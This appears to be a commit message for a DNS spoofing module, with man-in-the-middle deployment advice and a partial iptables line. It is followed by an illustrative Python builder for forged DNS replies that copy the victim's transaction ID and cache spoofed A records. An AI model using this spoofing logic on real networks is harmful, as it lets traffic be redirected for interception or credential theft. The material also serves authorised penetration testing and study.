1a253f92a1
DNS spoofing module should be feature-complete, with forwarding of requests which do not have cached answers (can be disabled, same as in the native server module), empty replies to reduce client wait on outstanding DNS requests, and post-send output in verbose mode to reduce garbage and execution time in the critical/racy path.

This module is best used in conditions where MITM is achieved by way of MAC spoofing, route interception, or compromise of an inline host on the datapath. The attacker should avoid forwarding original requests to the intended destination, or, if this is not possible, prevent replies from traversing the MITM space in order to avoid race conditions between the spoofer and the victim.

Example iptables configuration on MITM host:

    iptables -t nat -A POSTROUTING -o eth0 -p udp ! --dport 53 -j ...

Testing: internal testing in a VirtualBox local network, atop 802.11, and mostly in Neutron (with port security disabled on the VIFs) atop OpenStack Liberty ML2+OVS.
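The reply logic the commit message describes (spoofed answer for cached names, an empty NOERROR reply for uncached names when forwarding is disabled, and deferring the name to the forwarder otherwise) as an added, self-contained example. This is illustrative code written for this page, not the module's own implementation; the spoof table, the constructed query packets, and all function names are assumptions. It only builds and parses DNS wire-format packets, nothing is sent on the network.

```python
"""Illustrative DNS spoofing reply builder (added example, not the module's code)."""
import socket
import struct

# Constructed sample spoof table: qname -> spoofed A record. Hypothetical values.
SPOOF_TABLE = {"example.com.": "10.0.0.1"}

QR, AA, RD, RA = 0x8000, 0x0400, 0x0100, 0x0080


def build_query(txid, name, qtype=1, qclass=1):
    """Build a standard recursive-desired DNS query for one name (used as sample input)."""
    labels = name.rstrip(".").split(".")
    qname = b"".join(struct.pack("B", len(l)) + l.encode("ascii") for l in labels) + b"\x00"
    header = struct.pack("!HHHHHH", txid, RD, 1, 0, 0, 0)
    return header + qname + struct.pack("!HH", qtype, qclass)


def _skip_name(pkt, off):
    """Return the offset just past a wire-format name (labels or a compression pointer)."""
    while True:
        ln = pkt[off]
        if ln & 0xC0 == 0xC0:      # compression pointer: 2 bytes, name ends here
            return off + 2
        off += 1
        if ln == 0:
            return off
        off += ln


def parse_query(pkt):
    """Return (txid, flags, qname, qtype, qclass, raw question section) of a query."""
    txid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if qdcount != 1:
        raise ValueError("only single-question queries are handled")
    off, labels = 12, []
    while pkt[off] != 0:
        ln = pkt[off]
        if ln & 0xC0:
            raise ValueError("compression pointer in question name")
        labels.append(pkt[off + 1:off + 1 + ln].decode("ascii"))
        off += 1 + ln
    off += 1                                  # terminating zero label
    qtype, qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, flags, ".".join(labels) + ".", qtype, qclass, pkt[12:off + 4]


def build_response(query_pkt, spoof_table, forward, ttl=300):
    """Decide what to do with one query.

    Returns (action, packet): ('spoof', reply) for a table hit, ('forward', None)
    when the name is unknown and forwarding is enabled, or ('empty', reply) with an
    empty NOERROR answer so the client stops waiting instead of timing out.
    """
    txid, flags, qname, qtype, qclass, question = parse_query(query_pkt)
    rd = flags & RD                           # echo the client's RD bit
    if qtype == 1 and qclass == 1 and qname in spoof_table:
        header = struct.pack("!HHHHHH", txid, QR | AA | RA | rd, 1, 1, 0, 0)
        # Answer name is a pointer (0xC00C) back to the question name at offset 12.
        rr = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, 4) + socket.inet_aton(spoof_table[qname])
        return "spoof", header + question + rr
    if forward:
        return "forward", None
    header = struct.pack("!HHHHHH", txid, QR | RA | rd, 1, 0, 0, 0)
    return "empty", header + question


def header_fields(pkt):
    """Small parsed view of a DNS header, for checking what was built."""
    txid, flags, qd, an, ns, ar = struct.unpack("!HHHHHH", pkt[:12])
    return {"txid": txid, "qr": bool(flags & QR), "rcode": flags & 0xF, "ancount": an}


def answer_ips(pkt):
    """Extract IPv4 addresses from the A records in a response's answer section."""
    _, _, qd, an, _, _ = struct.unpack("!HHHHHH", pkt[:12])
    off = 12
    for _ in range(qd):
        off = _skip_name(pkt, off) + 4        # name + qtype + qclass
    ips = []
    for _ in range(an):
        off = _skip_name(pkt, off)
        rtype, rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
        off += 10
        if rtype == 1 and rclass == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(pkt[off:off + 4]))
        off += rdlen
    return ips


if __name__ == "__main__":
    for name in ("example.com.", "other.test."):
        action, reply = build_response(build_query(0x1234, name), SPOOF_TABLE, forward=False)
        # Verbose output happens after the decision, off the racy send path.
        print(name, action, answer_ips(reply) if reply else None)
```

The spoofed reply reuses the client's transaction ID and question section verbatim, which is what a stub resolver checks before accepting an answer; matching the source port and winning the race against the real upstream reply are transport concerns outside this snippet. The empty reply sets RCODE 0 with zero answers rather than NXDOMAIN, so the client gets a definitive answer immediately and does not hold the request open until its timeout.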